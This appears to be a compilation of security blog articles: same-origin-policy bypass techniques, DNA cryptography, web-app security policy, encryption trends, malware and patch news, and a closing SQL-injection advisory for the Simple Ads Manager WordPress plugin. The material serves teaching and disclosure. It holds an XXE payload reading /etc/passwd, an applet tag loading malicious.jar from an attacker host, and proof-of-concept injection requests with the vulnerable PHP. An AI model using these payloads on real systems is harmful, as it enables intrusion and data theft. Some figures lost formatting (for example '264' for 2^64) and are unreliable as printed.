Aerosol

The same origin policy is an important concept in the web application information security domain. In this policy, a web browser allows scripts contained in a first web page ‘A’ to access data/resources in a second web page ‘B’, however, only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page’s DOM (document object model). Let’s consider one example in a physical world scenario. Imagine a school where all students within have a different origin. One class has many students, but all are unrelated. If a guardian makes a request to the school staff for his/her son’s classmate’s progress report, the school staff would deny the same as he/she not authenticated for the same. Similarly, if the school received a request for checking a student’s progress report, first they would ensure the requester is a guardian/parent/close relation of the student before granting student’s details/progress report. This is closely related to the browser with the same origin policy (SOP). Now, imagine a school that allowed access to anyone’s progress report to any guardian from the outside world – that would be like a browser without SOP. The same origin policy mechanism defines a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information. A strict segregation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity. Same origin policy: Is it really important? Assume that you are logged into the Gmail server and visit a malicious website in the same browser, but another tab. Without implementing the same origin policy, an attacker can access your mail and other sensitive information using JavaScript. For example read private mail, send fake mail, read your chats. Also, Gmail uses JavaScript to enhance the user experience and save round trip bandwidth, so it is really so important that the browser can detect that this JavaScript is trusted to access Gmail resources. That’s where the same origin policy comes into the picture. Now imagine the same scenario and replace Gmail with your online banking application – it could be worse. Understand SOP with DOM: Same origin policy weds document object model When we talk about how JavaScript can access DOM policies, we consider the 3 portions of the URL, which are HOST NAME + SCHEME + PORT. If more than one application has the same hostname, scheme and port and is trying to access the DOM data, access will be granted. However, Internet Explorer only validates hostname + scheme before accessing the same. Internet Explorer does not care about PORT. This is traditional scenario which works well when accessing the same with one origin. In many cases, multiple hosts could be possible within the same root domain which accesses the source page’s DOM. Google is one example, which takes a series of sites’ authentication from the central authentication server. For instance, cart.httpsecure.org may take authentication through login.httpsecure.org. In such cases, the sites can use the document.domain property to allow other sites within the same domain to interact with the DOM (document object model). If you want to allow the code from cart.httpsecure.org to interact with the login.httpsecure.org, the developer will need to set the document.domain property to the root of the domain on both sites. i.e. document.domain = “httpsecure.org” This means that anything in the httpsecure.org domain can access the DOM in the current page. When setting up this way, you should keep in mind that if you deployed another site on the Internet, such as about.httpsecure.org, with some vulnerability, cart.httpsecure.org may vulnerable too and could be accessed at this origin. Let’s suppose an attacker is successfully able to upload some malicious code – then about.httpsecure.org would have same level of access as the login site. Understand SOP with CORS: Same origin policy weds cross-origin resource sharing Cross-origin resource sharing (CORS) is a mechanism that allows many resources (e.g. fonts, JavaScript, etc.) on a web page to be requested from another domain outside the domain from which the resource originated. Let’s suppose an application uses an XMLHttpRequest to send a request to a different origin. In this case you cannot read the response, but the request will arrive at its destination. That’s a very useful feature of cross-origin requests. The SOP also prevents you from reading the HTTP response header and body. The best way to relax the SOP and allow cross-origin communication with XHR is using cross-origin resource sharing (CORS). If the httpsecure.org origin returns the following response header, then every subdomain of httpsecure.org can open a bidirectional communication channel with httpsecure.org: Access-Control-Allow-Origin: *.Httpsecure.org Access-Control-Allow-Methods: OPTIONS, GET, POST, HEAD, PUT Access-Control-Allow-Headers: X-custom Access-Control-Allow-Credentials: true In the above response header, the first line describes the bidirectional communication channel. The second describes that the request can be made using any of the OPTIONS, GET, POST, PUT, HEAD methods, eventually including the third line x-custom header. Access-Control-Allow-Credentials:true specify for allowing authenticated communication to a resource. Understand SOP with plugins: Same origin policy weds plugins Note: If a plugin is installed for httpsecure.org:80, then it will only have access to httpsecure.org:80. Many SOP implementations in Java, Adobe Reader, Flash and Silverlight are currently suffering from different bypass methods. Most of the browser plugins implement the SOP in their own way, such as some versions of Java consider two different domains to have the SOP if the IP is the same. This might have a devastating result in a virtual hosting environment, which host multiple applications with the same IP address. If we talk about some plugins, such as Flash player and the PDF reader plugin, they have a long critical vulnerability history. Most of these issues allow an attacker to execute remote arbitrary code, which is far more critical than SOP bypass. In Flash, you can use the method which allows you to manage cross-origin communication, which can be done using crossdomain.xml, which resides in the root of the application file and might have some of the following code. <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-content-type"/> <allow-access-from domain="*.httpsecure.org" /> </cross-domain-policy> Using this code subdomain of httpsecure.org can achieve two-way communication with the application. Crossdomain.xml also supports Java and Silverlight plugins. Understand SOP with UI redressing: Same origin policy weds UI redressing UI redressing is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. UI redressing also known as clickjacking. For the attacker to bypass the SOP, it’s is little different. Some of these attacks rely on the fact the SOP was not enforced when performing the drag and drop function from the main window to an iframe. Understand SOP with browser history: Same origin policy weds browser history When we talk about browser history, the privacy of the end user always a concern. The same origin policy with browser history attack relies on traditional SOP implementation flaws, such as HTTP scheme having access to another scheme. Bypass SOP in Java Let talk about Java versions 1.7u17 and 1.6u45, which don’t enforce the SOP if two domains resolve to the same IP. Httpsecure.org and httpssecure.com resolve to the same IP (share hosting concept). A Java applet can issue cross-origin requests and read the responses. In Java versions 6 and 7, both have an equal method of the URL object. Two hosts are considered equivalent if both host names can be resolved into the same IP address. This type of vulnerability in Java SOP implementation is a critical issue when exploiting in virtual hosting environments where potentially hundreds of domains are managed by the same server and resolved to the same IP. The most important consideration concerning the privileges required by the applet to use the URL are BufferedReader and InputStreamReader objects. In Java 1.6, no user interaction is required to run the applet, however in 1.7, user permission is required to run the same due to the changes in the applet delivery mechanism implemented by Oracle Java 1.7. Now the user must explicitly use the click to play feature to run unsigned and signed applets. This feature can be bypassed using IMMUNITY and led to a subsequent (now patched) bug CVE-2011-3546 found to bypass SOP in Java. Similarly, a SOP bypass was found in Adobe reader. One of the security researchers Neal Poole found one issue: “If the resource used to load an applet was replying with 301 or 302 redirect”, the applet origin was evaluated as the source of the redirection and not the destination. Have a look at the following code: <applet code="malicious.class" archive="http://httpsecure.org?redirect_to= http://securityhacking123.com/malicious.jar" width="100" height="100"> </applet> Bypassing SOP in Adobe Reader Adobe Reader has number of security critical bugs in its browser plugin. Most of the security vulnerabilities are arbitrary code execution due to traditional overflow problems. The Adobe Reader PDF parser understands JavaScript. This attribute is often used by malware to hide malicious code inside PDFs. CVE-2013-0622, found by Billy Rios, Federico Lanusse and Mauro Gentile, allows bypassing the SOP (unpatched 11.0.0 version below). Where exploiting an open redirect which allows a foreign origin to access the origin of the redirect, the request that returns a 302 redirect response code is used to exploit the vulnerability. If we talk about XXE Injection, it involves trying to inject malicious payloads into the request that accepts XML input as below: <!DOCTYPE bar > <!ELEMENT bar ANY > <!ENTITY xxe SYSTEM "/etc/passwd" >]><bar>&xxe;</bar> In this XML parser that allows external entities, the value of &XXE is then replaced by the /etc/passwd. This technique can be used to bypass the SOP. It will load XE and the server will serve you with a 302 redirect response. Bypassing SOP in Adobe Flash Adobe Flash uses the crossdomain.xml file, which can control applications wherever Flash can receive data. We can set a restriction on this file to only trust mentioned sites as follows: <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-content-type"/> <allow-access-from domain="*" /> </cross-domain-policy> By setting the allow-access-from domain, a Flash object loaded from any origin can send requests and read responses. Bypassing SOP in Silverlight Silverlight is a Microsoft plugin that uses the same origin policy in the same way as Flash does. However, it uses clientaccess-policy.xml codes shown below: <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource path="/" include-subpaths="true"/> </grant-to> </policy> </cross-domain-access> </access-policy> Keep in mind that Flash and Silverlight have differences, such as Silverlight doesn’t segregate access between different origins based on scheme and port as Flash and CORS do. So, https://Httpsecure.org and HttpSecure - Secure Your Security consider the same origin policy. Bypassing SOP in Internet Explorer Internet Explorer 8 or below are vulnerable to SOP bypass in their implementation of document.domain. The issue can be exploited easily by overriding the document object and then the domain property. The following code demonstrates the same: var document; document = {}; document.domain = ‘httpsecure.org'; alert(document.domain); This code may cause a SOP violation error code in the JavaScript console if you run this in the latest browser. The same will work in older/legacy browser of Internet Explorer. Using XSS this can be exploited and can open bidirectional communication with other origins. References Same-origin policy - Wikipedia, the free encyclopedia Cross-origin resource sharing - Wikipedia, the free encyclopedia Clickjacking - Wikipedia, the free encyclopedia https://browserhacker.com/ Source

What is Cryptography? Cryptography is the science of study of secret writing. It helps in encrypting a plain text message to make it unreadable. It is a very ancient art; the root of its origin dates back to when Egyptian scribes used non-standard hieroglyphs in an inscription. Today, electronic or Internet communication has become more prevalent and a vital part of our everyday life. Securing data at rest and data in transit has been a challenge for organizations. Cryptography plays a very important role in the CIA triad of Confidentiality, Integrity and Availability. It provides mathematical techniques related to aspects of information security such as confidentiality, data integrity, entity authentication, and data origin authentication. Over the ages, these techniques have evolved tremendously with technological advancements and growing computing power. Encryption is a component in cryptography or science of secret communication. The part “en” means “to make” and “crypt” means hidden or secret. Encryption can be defined as a process to make information hidden or secret. In this digital age, encryption is based on two major algorithm. Asymmetric or Public key cryptography: Uses two keys, one is a public encryption key and other is a private decryption key. Symmetric or Secret key cryptography: Uses the same key for encryption and decryption processes. Challenges in traditional cryptography The keys used in modern cryptography are so large, in fact, that a billion computers working in conjunction with each processing a billion calculations per second would still take a trillion years to definitively crack a key. Though this doesn’t seem to be a problem now, it soon will be. Quantum computers are going to replace traditional binary computing in the near future. Since they can operate on the quantum level, these computers are expected to be able to perform calculations and operate at speeds no computer in use now could possibly achieve. So the codes that would take a trillion years to break could possibly be cracked in much less time with quantum computers. Traditional cryptography has the problem of key distribution and eavesdropping. Information security expert Rick Smith points out that the secrecy or strength of a cipher ultimately rests on three major things: The infrastructure it runs in: If the cryptography is implemented primarily in software, then the infrastructure will be the weakest link. If Bob and Alice are trying to keep their messages secret, Tom’s best bet is to hack into one of their computers and steal the messages before they’re encrypted. It’s always going to be easier to hack into a system, or infect it with a virus, than to crack a large secret key. In many cases, the easiest way to uncover a secret key might be to eavesdrop on the user and intercept the secret key when it’s passed to the encryption program. Key size: In cryptography, key size matters. If an attacker can’t install a keystroke monitor, then the best way to crack the ciphertext is to try to guess the key through a “brute-force” trial-and-error search. A practical cipher must use a key size that makes brute-force searching impractical. However, since computers get faster every year, the size of a “borderline safe” key keeps growing. Algorithm quality: Cipher flaws can yield “shortcuts” that allow attackers to skip large blocks of keys while doing their trial-and-error search. For example, the well-known compression utility PKZIP traditionally incorporated a custom-built encryption feature that used a 64-bit key. In theory, it should take 264 trials to check all possible keys. In fact, there is a shortcut attack against PKZIP encryption that only requires 227 trials to crack the ciphertext. The only way to find such flaws is to actually try to crack the algorithm, usually by using tricks that have worked against other ciphers. An algorithm usually only shows its quality after being subjected to such analyses and attacks. Even so, the failure to find a flaw today doesn’t guarantee that someone won’t find one eventually. At present, RSA Key length of 2048 bits is considered “Acceptable”. In 2009, researchers were able to crack a 768-bit RSA key and it remains as the current factoring record for the largest general integer. The Lenstra group estimated that factoring a 1024-bit RSA modulus would be about 1,000 times harder than their record effort with the 768-bit modulus, or in other words, on the same hardware, with the same conditions, it would take about 1,000 times as long. Breaking a 2048 bit key would take about 4.3 billion times longer than doing it for a 1024-bit key. A symmetric key algorithm DES is considered to be insecure now since the 56-bit key size it used was too small. Although DES uses a block size of 64-bit, only 56 bits are actually used by the algorithm; the final 8 bits are used for the parity check. In simple words, traditional cryptography and its security are based on difficult mathematical problems which are mature both in theory and realization. Both the secret-key and public-key methods of cryptology have unique flaws. With growth of computing power, the strength of traditional cryptography might become weak and breakable. DNA Computing A new technique for securing data using the biological structure of DNA is called DNA Computing (A.K.A molecular computing or biological computing). It was invented by Leonard Max Adleman in the year 1994 for solving the complex problems such as the directed Hamilton path problem and the NP-complete problem similar to The Traveling Salesman problem. Adleman is also known as the ‘A’ in the RSA algorithm – an algorithm that in some circles has become the de facto standard for industrial-strength encryption of data sent over the Web. The technique later on was extended by various researchers for encrypting and reducing the storage size of data that made the data transmission over the network faster and secured. DNA can be used to store and transmit data. The concept of using DNA computing in the fields of cryptography and steganography has been identified as a possible technology that may bring forward a new hope for unbreakable algorithms. Strands of DNA are long polymers of millions of linked nucleotides. These nucleotides consist of one of four nitrogen bases, a five carbon sugar and a phosphate group. The nucleotides that make up these polymers are named after the nitrogen base that it consists of: Adenine (A), Cytosine ©, Guanine (G) and Thymine (T). Mathematically, this means we can utilize this 4 letter alphabet ? = {A, G, C, T} to encode information, which is more than enough considering that an electronic computer needs only two digits, 1 and 0, for the same purpose. Advantages of DNA computing Speed – Conventional computers can perform approximately 100 MIPS (millions of instruction per second). Combining DNA strands as demonstrated by Adleman made computations equivalent to 10^9 or better, arguably over 100 times faster than the fastest computer. Minimal Storage Requirements – DNA stores memory at a density of about 1 bit per cubic nanometer, where conventional storage media requires 10^12 cubic nanometers to store 1 bit. Minimal Power Requirements – There is no power required for DNA computing while the computation is taking place. The chemical bonds that are the building blocks of DNA happen without any outside power source. There is no comparison to the power requirements of conventional computers. Multiple DNA crypto algorithms have been researched and published, like the Symmetric and Asymmetric Key Crypto System using DNA, DNA Steganography Systems, Triple Stage DNA Cryptography, Encryption algorithms inspired by DNA, and Chaotic computing. DNA Cryptography can be defined as a technique of hiding data in terms of DNA sequence. In the cryptographic technique, each letter of the alphabet is converted into a different combination of the four bases which make up the human deoxyribonucleic acid (DNA). DNA cryptography is a rapid emerging technology which works on concepts of DNA computing. DNA stores a massive amount of information inside the tiny nuclei of living cells. It encodes all the instructions needed to make every living creature on earth. The main advantages of DNA computation are miniaturization and parallelism of conventional silicon-based machines. For example, a square centimeter of silicon can currently support around a million transistors, whereas current manipulation techniques can handle to the order of 1020 strands of DNA. DNA, with its unique data structure and ability to perform many parallel operations, allows one to look at a computational problem from a different point of view. A simple mechanism of transmitting two related messages by hiding the message is not enough to prevent an attacker from breaking the code. DNA Cryptography can have special advantage for secure data storage, authentication, digital signatures, steganography, and so on. DNA can also be used for producing identification cards and tickets. “Trying to build security that will last 20 to 30 years for a defense program is very, very challenging,” says Benjamin Jun, vice president and chief technology officer at Cryptography Research. Multiple studies have been carried out on a variety of biomolecular methods for encrypting and decrypting data that is stored as a DNA. With the right kind of setup, it has the potential to solve huge mathematical problems. It’s hardly surprising then, that DNA computing represents a serious threat to various powerful encryption schemes. Various groups have suggested using the sequence of nucleotides in DNA (A for 00, C for 01, G for 10, T for 11) for just this purpose. One idea is to not even bother encrypting the information but simply burying it in the DNA so it is well hidden, a technique called DNA steganography. DNA Storage of Data has a wide range of capacity: Medium of Ultra-compact Information storage: Very large amounts of data that can be stored in compact volume A gram of DNA contains 1021 DNA bases = 108 Terabytes of data. A few grams of DNA may hold all data stored in the world. Conclusion DNA cryptography is in its infancy. Only in the last few years has work in DNA computing seen real progress. DNA cryptography is even less well studied, but ramped up work in cryptography over the past several years has laid good groundwork for applying DNA methodologies to cryptography and steganography. Researches and studies are being carried out to identify a better and unbreakable cryptographic standard. A number of schemes have been proposed that offer some level of DNA cryptography, and are being explored. At present, work in DNA cryptography is centered on using DNA sequences to encode binary data in some form or another. Though the field is extremely complex and current work is still in the developmental stages, there is a lot of hope that DNA computing will act as a good technique for Information Security. References An Overview of Cryptography Handbook of Applied Cryptography Encryption vs. Cryptography - What is the Difference? Traditional Cryptology Problems - HowStuffWorks Understanding encryption and cryptography basics https://www.digicert.com/TimeTravel/math.htm http://securityaffairs.co/wordpress/33879/security/dna-cryptography.html http://research.ijcaonline.org/volume98/number16/pxc3897733.pdf http://searchsecurity.techtarget.com/answer/How-does-DNA-cryptography-relate-to-company-information-security http://www.technologyreview.com/view/412610/the-emerging-science-of-dna-cryptography/ Source

Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-profile, getting more sophisticated, and increasing in frequency. According to the Gartner Group, 75 percent of cyber attacks and web security violations occur through Internet applications. Regardless of the development of the application being outsourced or in-house, adversaries examine the infrastructure of an application and its design to identify potential vulnerabilities that can be exploited. High-risk threats to web applications In particular, enterprises need to be aware of the following threats to web applications. The focus is on the wide repertoire of techniques adversaries use to compromise web applications and sites: DoS (Denial of Service): DoS attacks involve hackers overwhelming a web application with multiple requests for information, slowing down the operation of a website or entirely taking it down. A multi-source attack is considered a distributed DoS or DDoS, which routes the malicious traffic through a bigger number of servers. Attackers may also upload dangerous files, which may be downloaded by employees or processed in a corporate environment. Cross-site scripting (XSS): This is a common vulnerability that exploits web application weaknesses to attack users. The attack involves hackers passing data that’s crafted to masquerade legitimate functionality; without proper validation of data, malicious code is transferred to the web browser. In many cases, cyber criminals craft attacks via JavaScript, but attacks may also include Flash, HTML, or another code executed by web browsers. Cross-site scripting enable hackers to steal credentials, hijack sessions, or redirect users to malicious sites. SQL injection: These are random attacks that target applications with weak security to inject malware to extract data or aid virus distribution. These two scenarios are often a result of poor programming. Successful attacks involve hackers modifying the logic of SQL statements against databases. The application, in most cases, builds dynamic query statements, enabling malicious users to work with the data. Consequences can include data corruption, account compromise, or even a complete host takeover. Parameter & buffer manipulation: Websites often use URL parameters to pass information between web pages. Hackers can take advantage of this process and rewrite parameters in malicious ways. They may also manipulate buffers (a small storage allocated for data), andoverload them so that additional data overwrites data in other areas. Hackers may also override data with their own malicious code. Security policy template Security policies are, in effect, a strategy to protect web applications and ensure availability at all times. These generally include steps to identify responsibilities, predict threat vectors, and determine prevention & mitigation methodologies. It is essential to define rules for ensuring high availability of applications and minimizing weaknesses. Access and control mechanisms It is common for web applications to lack sufficient authorization checks for people attempting to access their resources. In a secure environment, there should be both role based and user access controls. Organizations should ensure that users can’t bypass ACLs by navigating directly to a file or page. This can be done by setting ACLs to default grant or deny access to authorized users and roles. The IT team can also utilize vetted frameworks and libraries. Access and control should be kept separate, and custom authorization routines should be avoided, as they make the authentication of all necessary channels more challenging. Delineation of responsibilities Never assume there are predefined responsibilities to access files and data stored by web applications. A lot of testing and experience goes into vetted frameworks, encryption algorithms and libraries, so make sure there is a clear description of responsibilities for every user at every possible step. The more default the set of responsibilities, the more difficult it will become to securing the application. Roles and access control are not just for developers, but for all people involved in using web applications. You need to have some delineation of roles with different levels of access for each user. While every organization’s application development program will be different, responsibilities can be handled in different ways or added in different places, and still be effective. Security resources and tools A well-defined policy template includes the use of encryption algorithm for web applications. Users have to determine the data that is valuable enough for encryption, and identify vulnerabilities through threat modeling. Some resources may have to be sacrificed to secure highly sensitive data. Implementations like a web application firewall will safeguard enterprise applications and websites from any cyber threat, so you can avoid costly downtime and data breach attacks. Enterprises are recommended to look for PCI-certified WAF as it protects against Cross-site scripting, SQL injections, and other threats. Some offerings include custom security rules that let you enforce security policies efficiently while eliminating false positives. New solutions are also using crowdsourcing techniques to protect applications with collective knowledge about the modern threat landscape. Threat information is aggregated using big data analytics. Disaster recovery and emergency mechanisms Disaster recovery solutions are required for immediate response to high-risk situations and mitigation strategies must be deployed to limit exposure from an attack. Disaster recovery should be allowed to bypass security assessments and address the risk before a proper assessment can be carried out. Patch releases, on the other hand, are subjected to appropriate level assessment based on the threats to the application architecture and/or functionality. CIOs are the personnel in charge of disaster recovery initiatives. Emergency mechanisms may include steps to take the application off-the-web or stop functionality release into the live environment if multiple threats increase the risk to unacceptable levels. Emergencies should be addressed in a point/patch release unless other mitigation strategies limit exposure. Credentials after patching may be temporarily stored outside of the webroot until the application infrastructure is tested in updated areas of the application environment. Other measures When web applications feature hard-coded credentials, the user can store credentials in the form of hashes to improve security in case the database or the configuration files get breached. Strict ACLs can also be deployed to protect credentials. Enterprises should also use a whitelist of acceptable input commands. If applications are configured to construct SQL queries, but include vulnerabilities that enable hackers to modify these queries, then it is beneficial to avoid dynamic queries, quote arguments, and special characters. The database inputs should be sanitized in general, and there should be strict rules for input validation. Compliance measures and business benefits When it comes to compliance, users who violate this policy should be subjected to a hearing, which may be concluded with a disciplinary action such as termination of employment, depending on the nature of violation. Everyone accessing web applications should undergo assessment as a requirement of a security policy and adhere to the policy unless exempted in certain circumstances. The infrastructure of all applications should be updated to include the security control process. Any web applications that lack appropriate security controls should be taken down for formal assessment, and should not make their way online until the CIO clears them for security integration. All these measures will result in business benefits, such as no loss of productivity during downtimes, and ensure SLAs are met. An enterprise with highly secured web applications will also attract more clients, as they would be better able to protect sensitive customer information. Organizations following the security policy template would also enjoy technical benefits such as high availability and security of data. Both these factors are likely to improve client-wide and industry wide reputation. Lastly, the policy will bridge the gap between good IT practices and enterprise security compliance. Source

When mega-retailer Target was the victim of a data breach during the 2013 holiday season, more than 70 million customers earned that their personal information, including email addresses and credit card numbers, had possibly been compromised. However, there was one small bright spot in the torrent of bad news: Target reported that the PIN numbers for compromised debit cards were encrypted, and therefore useless to the criminals who now had access to them. While that might have been little consolation to those customers who had to spend time locking down their accounts, to Target, it was a major victory in an otherwise bleak situation. Because the retailer did employ encryption to protect certain vital data, they were granted “Safe Harbor” from certain reporting requirements and more importantly, major fines, as a result of the breach. The Target data beach, and the others that have occurred since at retailers like Nordstrom and Home Depot, only serve to underscore the importance of encryption as part of a data protection strategy. While prior to these breaches, businesses that collect customer payment information, including credit and debit card numbers, were required by the Payment Card Industry Data Security Standards (PCI DSS) to encrypt data, many other businesses that store and transmit data via networks had less defined rules regarding encryption. However, that’s all changing. Encryption, once viewed as “extra” protection by many, has become a priority in the ongoing quest to secure data. 3 Top Trends in Data Encryption The fact that encryption has become a bigger priority in the last year is not the only change in the data security universe. In fact, the new emphasis on encryption itself has led to some significant trends. Among them: 1. Key Management Has Become More Complex One of the leading causes of data breaches is the inappropriate management of credentials, and encryption key management falls squarely under the umbrella of credential management. As more enterprises adopt encryption as part of their security protocol, the number of keys that need to be managed has also increased. Vendors that offer encryption as a service are growing more reluctant to be responsible for customer keys, while businesses employing encryption are also finding challenges in maintaining separation between the keys and the encrypted data. 2. Compliance Standards Are Changing While certain regulations, including the PCI DSS and HIPPA already required encryption as a minimum security standard, those regulations are expanding and becoming more stringent. The definition of “sensitive data” is expanding all the time, and organizations that fail to comply with the regulatory standards of their industry could face serious consequences. Many are choosing to err on the side of caution, and employing advanced encryption ahead of regulatory changes. 3. Expectations for Encryption Are Evolving One of the primary reasons that many businesses have resisted encryption — especially small businesses — is that encryption has often been viewed as complex and cumbersome function. Some older (read: a decade or more) encryption solutions did present some hurdles to users, but today’s virtualization security solutions present a seamless alternative. In short, modern encryption technology protects data without any effect on application functionality. Developers are also working toward homomorphic encryption to make the analysis of Big Data more thorough. Currently, most cloud based data analysis tools are not able to work with encrypted data. Businesses must either take the risk of working with unencrypted data in the cloud, or develop their own analytical applications, which increases expense. Homomorphic encryption, however, allows encrypted data to be analyzed just as it would if it were unencrypted. This allows businesses to not only tap into the power of Big Data more securely, it also presents opportunities to analyze data from multiple sources at once, without exposing potentially sensitive information. Even just a few short years ago, encryption was often viewed as a “bonus” security measure, something that enterprises could choose to employ. Believed to be the realm of government agencies and hackers, it was often reserved for the most sensitive data only, and considered unnecessary for the average user. With so much data being shared online, and with the explosive growth of cloud computing, though, encryption has become as commonplace as antivirus protection and firewalls. As adoption grows, expect to see more changes in encryption standards and security management going forward. Source

Researchers have seen an uptick in Adobe Flash .SWF files being used to trigger malicious iFrames across websites. Several hundred WordPress and Joomla websites have been swept up in the campaign, first observed by researchers at the firm Sucuri last November. “Though it’s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar,” Peter Gramantik, a senior malware researcher at the firm wrote Thursday. According to Gramantik the infection is clearly marked by a .SWF file with three random characters as a name that’s stored in a site’s images/banners/ folder. As far as the firm has seen, each file has a random hashed ID parameter attached to the end of it. While the malware’s variable names, coding logic, and UserAgent remain the same, one of the main differences from last November’s version of the campaign and this one is that this incarnation has spread to from Joomla sites to WordPress sites. As is to be expected, the website delivering the malicious payload has changed as well. The .SWF files, also known as small web format files, inject an invisible iFrame, which can go on to drop other exploits. Source

Virtual Machine maker VMware has updated a slew of its offerings in order to address a critical information disclosure vulnerability in the Oracle’s Java runtime environment (JRE). The update essentially installs the latest version of JRE into VMware systems where the old version of JRE was affected by CVE-2014-6593. The newer JRE versions fix other bugs as well, but the Full Disclosure entry for VMware is only concerned with CVE-2014-6593, which could allow information disclosure inside certain VMware environments. VMware products operating on JRE 1.7 update 75 and newer and JRE 1.6 update 91 and newer are not impacted by this vulnerability. CVE-2014-6593 is also known as “SKIP” or “SKIP-TLS.” Affected VMware produicts include, Horizon View 6.x or 5.x, Horizon Workspace Portal Server 2.1 or 2.0, vCenter Operations Manager 5.8.x or 5.7.x, vCloud Automation Center 6.0.1, vSphere Replication prior to 5.8.0.2 or 5.6.0.3, vRealize Automation 6.2.x or 6.1.x, vRealize Code Stream 1.1 or 1.0, vRealize Hyperic 5.8.x, 5.7.x or 5.0.x, vSphere AppHA Prior to 1.1.x, vRealize Business Standard prior to 1.1.x or 1.0.x, NSX for Multi-Hypervisor prior to 4.2.4, vRealize Configuration Manager 5.7.x or 5.6.x and vRealize Infrastructure 5.8 or 5.7. The patch resolving this JRE issue is pending for a number of VMware products. You can find a list of mitigation options on the Full Disclosure mailing list. Source

#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ Content-Length: 270 Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3 - Vulnerable file: simple-ads-manager/sam-ajax.php - Vulnerable code: case 'sam_ajax_sam_hits': if(isset($_POST['hits']) && is_array($_POST['hits'])) { $hits = $_POST['hits']; $values = ''; $remoteAddr = $_SERVER['REMOTE_ADDR']; foreach($hits as $hit) { $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; } $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; $result = $wpdb->query($sql); if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); else echo json_encode(array( 'success' => false, 'result' => $result, 'sql' => $sql, 'hits' => $hits, 'values' => $values )); } break; ---SQL INJECTION 2--- +REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: case 'sam_ajax_load_posts': $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; //set @RoW_num + 1 AS recid $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;"; $posts = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($posts as &$val) { switch($val['type']) { case 'post': $val['type'] = $sPost; break; case 'page': $val['type'] = $sPage; break; default: $val['type'] = $sPost . ': '.$val['type']; break; } $k++; $val['recid'] = $k; } $out = array( 'status' => 'success', 'total' => count($posts), 'records' => $posts ); break; ---SQL INJECTION 3--- +REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 22 action=load_combo_data 